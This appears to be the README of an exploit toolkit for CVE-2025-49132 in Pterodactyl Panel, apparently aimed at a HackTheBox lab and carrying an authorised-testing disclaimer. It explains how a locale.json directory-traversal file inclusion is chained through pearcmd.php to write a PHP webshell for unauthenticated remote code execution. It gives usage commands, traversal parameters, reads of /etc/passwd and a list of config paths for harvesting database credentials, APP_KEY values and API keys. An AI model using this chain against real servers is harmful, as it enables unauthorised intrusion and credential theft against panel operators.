Share
## https://sploitus.com/exploit?id=C233554B-5BC2-5DB4-8ACD-9E5A9315C406
```
ββββββββββ ββββββββββ βββββββββββββββ βββββββ ββββββ ββββ ββββββββββββββ
ββββββββββββ βββββββββββββββββββββββββββββββββββββββββββββββββ ββββββββββββββ
βββ βββββββ ββββββββββββββ ββββββββββββββββββββββββββββββ βββββββββ βββ
βββ βββββ ββββββββββββββ βββββββββββββββ ββββββββββββββββββββββββ βββ
ββββββββ βββ βββββββββββββββββββ ββββββ βββ ββββββ ββββββββββββββββββββββ
βββββββ βββ βββββββ βββββββββββ ββββββ βββ ββββββ βββββββββββββββββββββ
```
```
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β ββββ PTERODACTYL PANEL EXPLOIT SUITE ββββ β
β ββββ CVE-2025-49132 ββββ β
β ββββ Author: DΞΞ£MΣ¨Π ββββ β
β ββββ For authorised security testing ββββ β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
```
---
```
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β "The panel thinks it speaks one language. β
β We taught it to read another." β
β β
β Two tools. One vulnerability. Total filesystem access. β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
```
---
## `// THREAT_BRIEFING`
**CVE-2025-49132** β Pterodactyl Panel suffers from a **Local File Inclusion** vulnerability in the locale loading mechanism at `/locales/locale.json`. The `locale` and `namespace` query parameters are not sanitised, allowing directory traversal to include arbitrary `.php` files from the server filesystem. When chained with PHP's `pearcmd.php` (available on most systems with PEAR installed), this LFI can be escalated to **unauthenticated Remote Code Execution**.
```
βββββββββββββββββββββββββββββββββββββ
β /locales/locale.json β
β ?locale=../../../../../../ β β directory traversal
β &namespace=config/database β β file inclusion
βββββββββββββββββββββββββββββββββββββ
β
βΌ
ββββββββββββββββββββββββββ
β Arbitrary .php read β
β Config exfiltration β
β Credential harvesting β
ββββββββββββββββββββββββββ
```
> If you've recently discovered a certain **HackTheBox** lab featuring a familiar winged reptile... these tools might come in handy. Just saying.
---
## `// ARSENAL`
```
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β β
β ββββββββββββββββββββββββββββββββββββββββββββ β
β ββββββββββββββββββββββββββββββββββββββββββββ β
β ββββββββββββββββββββββββββββββββββββββββββββ β
β β
β pearlescent.py β PEAR LFI-to-RCE Exploit β
β The heavy hitter. Chains pearcmd.php config-create to write a webshell β
β to disk via LFI, then triggers it for full command execution. β
β β
β β CVE: CVE-2025-49132 β
β β Chain: LFI β pearcmd.php β config-create β webshell β RCE β
β β Auth: None required (unauthenticated) β
β β Author: DΞΞ£MΣ¨Π β
β β
β βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ£
β β
β ββββββββββββββββββββββββββββββββββββ β
β ββββββββββββββββββββββββββββββββββββ β
β ββββββββββββββββββββββββββββββββββββ β
β β
β ptero-lfi-rce.py β Pterodactyl LFI Reader & Scanner β
β The recon blade. Reads arbitrary .php files off the target via LFI. β
β Supports single-file reads, batch scanning with wordlists, and β
β automatic credential extraction from config files. β
β β
β β CVE: CVE-2025-49132 β
β β Mode: LFI file read / batch scan β
β β Auth: None required (unauthenticated) β
β β Author: DΞΞ£MΣ¨Π β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
```
---
## `// USAGE β pearlescent.py`
```
βββββββββββββββββββββββββββββββββββ
β PEARLESCENT β LFI to RCE Pipeline β
βββββββββββββββββββββββββββββββββββ
```
**Requirements:** `curl` (uses subprocess, no pip dependencies)
```bash
# Execute a single command on the target
python3 pearlescent.py ''
# Examples
python3 pearlescent.py panel.pterodactyl.htb 'id'
python3 pearlescent.py panel.pterodactyl.htb 'cat /etc/passwd'
python3 pearlescent.py panel.pterodactyl.htb 'ls -la /var/www'
```
**How it works:**
```
ββββββββββββββββ ββββββββββββββββββββ βββββββββββββββββ
β Stage 1 ββββββΆβ Stage 2 ββββββΆβ Output β
β Write shell β β Trigger via LFI β β Parse & show β
ββββββββββββββββ ββββββββββββββββββββ βββββββββββββββββ
β β
βΌ βΌ
pearcmd.php /tmp/shell.php
config-create included via LFI
writes PHP to system() executes
/tmp/shell.php your command
```
1. Abuses `pearcmd.php` via the LFI to write a PHP webshell containing your command to `/tmp/shell.php`
2. Triggers the webshell by including it through the same LFI vector
3. Parses the command output from the PEAR config-create response format
---
## `// USAGE β ptero-lfi-rce.py`
```
ββββββββββββββββββββββββββββββββββββββ
β PTERO-LFI β Filesystem Recon Blade β
ββββββββββββββββββββββββββββββββββββββ
```
**Requirements:** `pip install requests`
### Single File Read
```bash
# Read a specific PHP config file
python3 ptero-lfi-rce.py -u http://panel.pterodactyl.htb -p ../../config/database.php
# Read with full output (no truncation)
python3 ptero-lfi-rce.py -u http://panel.pterodactyl.htb -p ../../config/app.php --raw
```
### Batch Scan with Wordlist
```bash
# Scan multiple paths and save hits
python3 ptero-lfi-rce.py -u http://panel.pterodactyl.htb -w paths.txt -o loot/
```
### Connection Options
```bash
# Route through Burp proxy
python3 ptero-lfi-rce.py -u http://panel.pterodactyl.htb -p ../../config/database.php \
--proxy http://127.0.0.1:8080
# With cookie authentication
python3 ptero-lfi-rce.py -u http://panel.pterodactyl.htb -p ../../config/database.php \
--cookie "session=abc123"
# Skip TLS verification
python3 ptero-lfi-rce.py -u https://panel.pterodactyl.htb -p ../../config/database.php \
--no-verify
```
### Useful Paths to Try
```
../../config/database.php β DB credentials (MySQL/PostgreSQL)
../../config/app.php β APP_KEY, debug mode, app URL
../../.env β environment variables (if .php check bypassed)
../../config/mail.php β SMTP credentials
../../config/services.php β API keys for external services
```
> The scanner auto-extracts DB credentials and Laravel `APP_KEY` values when found. Watch the output closely.
---
## `// WORKFLOW`
```
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β β
β STEP 1 βββββββββββββββββββββββββββββββββββββββββββββ β
β Run ptero-lfi-rce.py to enumerate config files β
β Pull database.php, app.php, services.php β
β Extract credentials and APP_KEY β
β β
β STEP 2 βββββββββββββββββββββββββββββββββββββββββββββ β
β Run pearlescent.py for command execution β
β Confirm RCE with 'id' or 'whoami' β
β Escalate from there β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
```
---
## `// DISCLAIMER`
```
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β β
β These tools are provided for AUTHORISED SECURITY TESTING and β
β EDUCATIONAL PURPOSES only. Use them in CTF environments, β
β HackTheBox labs, or engagements where you have explicit β
β written permission. β
β β
β Unauthorised access to computer systems is illegal. β
β The author assumes no liability for misuse. β
β β
β ββββ DΞΞ£MΣ¨Π ββββ β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
```
---
```
Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·
: :
: "Every panel has a locale. :
: Every locale has a path. :
: Every path leads somewhere :
: it was never meant to go." :
: :
: β DΞΞ£MΣ¨Π, 2025 :
: :
Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·Β·
```